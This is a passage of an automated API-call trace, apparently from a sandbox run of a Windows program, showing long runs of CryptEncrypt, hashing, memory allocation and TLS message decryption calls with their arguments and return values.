pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.356] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0146.357] malloc (_Size=0x1fd) returned 0x3691270 [0146.357] free (_Block=0x0) [0146.357] free (_Block=0x3df00e0) [0146.357] malloc (_Size=0x1fd) returned 0x3df00e0 [0146.357] free (_Block=0x0) [0146.357] CryptDuplicateHash (in: hHash=0x4329b8, pdwReserved=0x0, dwFlags=0x0, phHash=0x37dfb14 | out: phHash=0x37dfb14) returned 1 [0146.357] CryptHashData (hHash=0x3e0b58, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0146.357] malloc (_Size=0x14) returned 0x3f653c0 [0146.358] free (_Block=0x0) [0146.358] CryptGetHashParam (in: hHash=0x3e0b58, dwParam=0x2, pbData=0x3f653c0, pdwDataLen=0x37dfacc, dwFlags=0x0 | out: pbData=0x3f653c0, pdwDataLen=0x37dfacc) returned 1 [0146.358] CryptHashData (hHash=0x4329b8, pbData=0x3df00e0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0146.358] free (_Block=0x3f653c0) [0146.358] CryptDestroyHash (hHash=0x3e0b58) returned 1 [0146.358] free (_Block=0x3df00e0) [0146.358] free (_Block=0x3d81e60) [0146.358] malloc (_Size=0x1fd) returned 0x3d81e60 [0146.358] free (_Block=0x0) [0146.358] free (_Block=0x0) [0146.358] free (_Block=0x0) [0146.358] SetEvent (hEvent=0x5c8) returned 1 [0146.358] SetEvent (hEvent=0x3a4) returned 1 [0146.358] free (_Block=0x0) [0146.358] free (_Block=0x3d81e60) [0146.358] free (_Block=0x3691270) [0146.358] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x80090318 [0146.358] recv (in: s=0x5b0, buf=0x3de7008, len=16413, flags=0 | out: buf=0x3de7008*) returned 1057 [0152.048] DecryptMessage (in: phContext=0x3d81944, pMessage=0x37dfaec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37dfaec, pfQOP=0x0) returned 0x0 [0152.048] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.049] free (_Block=0x0) [0152.049] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.049] free (_Block=0x0) [0152.049] free (_Block=0x0) [0152.049] free (_Block=0x3d81e60) [0152.049] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.049] free (_Block=0x0) [0152.049] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.050] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] CryptEncrypt (in: hKey=0x4328f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.051] malloc (_Size=0x1fd) returned 0x3691270 [0152.052] free (_Block=0x0) [0152.052] free (_Block=0x3df00e0) [0152.052] free (_Block=0x3d81e60) [0152.052] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.052] free (_Block=0x0) [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.052] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.053] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x432c78, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x60ef64*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] malloc (_Size=0x1fd) returned 0x3df00e0 [0152.054] free (_Block=0x0) [0152.054] free (_Block=0x3691270) [0152.054] free (_Block=0x3d81e60) [0152.054] malloc (_Size=0x1fd) returned 0x3d81e60 [0152.054] free (_Block=0x0) [0152.054] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.054] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10, dwBufLen=0x10 | out: pbData=0x369198c*, pdwDataLen=0x37dfa84*=0x10) returned 1 [0152.055] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, 